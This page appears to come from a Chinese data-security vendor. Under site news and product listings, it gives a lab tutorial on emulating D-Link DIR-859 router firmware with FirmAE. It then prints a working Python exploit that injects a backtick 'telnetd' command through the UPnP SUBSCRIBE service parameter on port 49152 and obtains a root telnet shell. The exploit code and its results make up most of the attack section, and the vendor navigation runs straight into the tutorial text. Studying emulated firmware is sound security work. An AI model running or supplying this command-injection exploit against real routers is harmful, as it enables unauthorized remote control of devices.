2025中国互联网产业年会丨《中国互联网产业绿色算力发展倡议》正式发布
2025-02-07
美创用户专访 | 精细化管理:医疗行业数据分类分级的策略与实践
2025-01-10
容灾演练双月报|美创助力某特大型通信基础设施央企顺利完成多个核心系统异地容灾演练
2025-01-10
国家级|美创、徐医附院共建项目入选工信部《2024年网络安全技术应用典型案例拟支持项目名单》
2024-12-20
全球数据跨境流动合作倡议
2024-11-22
存储域
数据库加密 诺亚防勒索访问域
数据库防水坝 数据库防火墙 数据库安全审计 动态脱敏流动域
静态脱敏 数据水印 API安全 API审计 医疗防统方运维服务
数据库运维服务 中间件运维服务 国产信创改造服务 驻场运维服务 供数服务安全咨询服务
数据出境安全治理服务 数据安全能力评估认证服务 数据安全风险评估服务 数据安全治理咨询服务 数据分类分级咨询服务 个人信息风险评估服务 数据安全检查服务1.FirmAE 工具安装
首先拉取FirmAE 工具仓库
git clone --recursive https://github.com/pr0v3rbs/FirmAE
运行下载脚本
cd FirmAE/./download.sh
运行./install.sh进行安装
2.下载固件
本文模拟的是设备型号为D-Link DIR-859
下载地址:
http://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DIR-859
下载后得到DIR859Ax_FW105b03.bin固件文件
3.FirmAE工具初始化
在FirmAE工具目录下执行./init.sh进行初始化
4.安装binwalk
这里使用FirmAE工具目录下的binwalk安装程序进行安装
cd binwalk-2.3.3/python3 setup.py install
5.模拟运行固件
执行如下命令对固件进行解压
binwalk -Me /root/DIR859_FW102b03.bin --run-as=root
执行如下命令来模拟运行固件
sudo ./run.sh -r DIR-859 /root/DIR859_FW102b03.bin
使用浏览器访问http://192.168.0.1,出现如下界面则表明成功模拟了一台D-Link DIR-859路由器
查看端口
nmap 192.168.0.1
使用49152端口
EXP内容如下:
import socket
import os
from time import sleep
def httpSUB(server, port, shell_file):
con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Payload = "SUBSCRIBE /gena.cgi?service=" + str(shell_file) + " HTTP/1.0\n"
Payload += "Host: " + str(server) + ":" + str(port) + "\n"
Payload += "Callback: <http://192.168.126.128:33/>\n"
Payload += "NT: upnp:event\n"
Payload += "Timeout: Second-1800\n"
Payload += "Accept-Encoding: gzip, deflate\n"
Payload += "User-Agent: gupnp-universal-cp GUPnP/1.0.2 DLNADOC/1.50\n\n"
print(Payload)
sleep(1)
print('[*] Sending Payload')
con.connect((socket.gethostbyname(server),port))
con.send(Payload.encode())
results = con.recv(4096)
sleep(1)
print('[*] Running Telnetd Service')
serverInput = raw_input('IP Router: ')
portInput = 49152
httpSUB(serverInput, portInput, '`telnetd`')
执行EXP
python poc.py
使用nmap扫描可以看到已成功通过漏洞开启了telnetd服务
nmap 192.168.0.1
执行telnet 192.168.0.1,成功获取shell